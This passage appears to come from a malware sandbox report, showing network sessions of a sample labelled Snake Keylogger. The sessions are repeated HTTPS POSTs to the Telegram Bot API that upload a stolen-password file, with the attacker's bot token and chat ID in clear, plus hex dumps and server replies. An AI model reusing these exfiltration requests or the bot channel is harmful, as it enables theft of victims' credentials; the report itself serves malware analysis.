                                                                    2022-06-26 07:33:53 UTC294OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 31 33 63 33 62 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757013c3be7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:54 UTC294INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:54 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:54 UTC295INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66943,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228834,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    175192.168.2.550032149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:54 UTC295OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570177d6be
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:54 UTC295OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 31 37 37 64 36 62 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570177d6beContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:54 UTC296INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:54 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:54 UTC296INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66944,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228834,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    176192.168.2.550034149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:54 UTC297OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575701aead2e
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:54 UTC297OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 31 61 65 61 64 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575701aead2eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:54 UTC298INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:54 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:54 UTC298INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66945,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228834,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    177192.168.2.550035149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:54 UTC298OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575701e32082
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:54 UTC299OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 31 65 33 32 30 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575701e32082Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:55 UTC299INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:55 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:55 UTC300INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66947,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228835,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    178192.168.2.550037149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:55 UTC300OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575702211da0
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:55 UTC300OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 32 32 31 31 64 61 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575702211da0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:55 UTC301INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:55 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:55 UTC301INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66948,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228835,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    179192.168.2.550039149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:55 UTC302OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757025cb83f
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:55 UTC302OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 32 35 63 62 38 33 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757025cb83fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:55 UTC303INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:55 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:55 UTC303INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66949,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228835,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    18192.168.2.549786149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:45 UTC30OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756d8b3d0ea
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:45 UTC30OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 38 62 33 64 30 65 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756d8b3d0eaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:46 UTC31INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:46 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:46 UTC31INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66765,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228766,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    180192.168.2.550040149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:56 UTC303OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575702938e2d
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
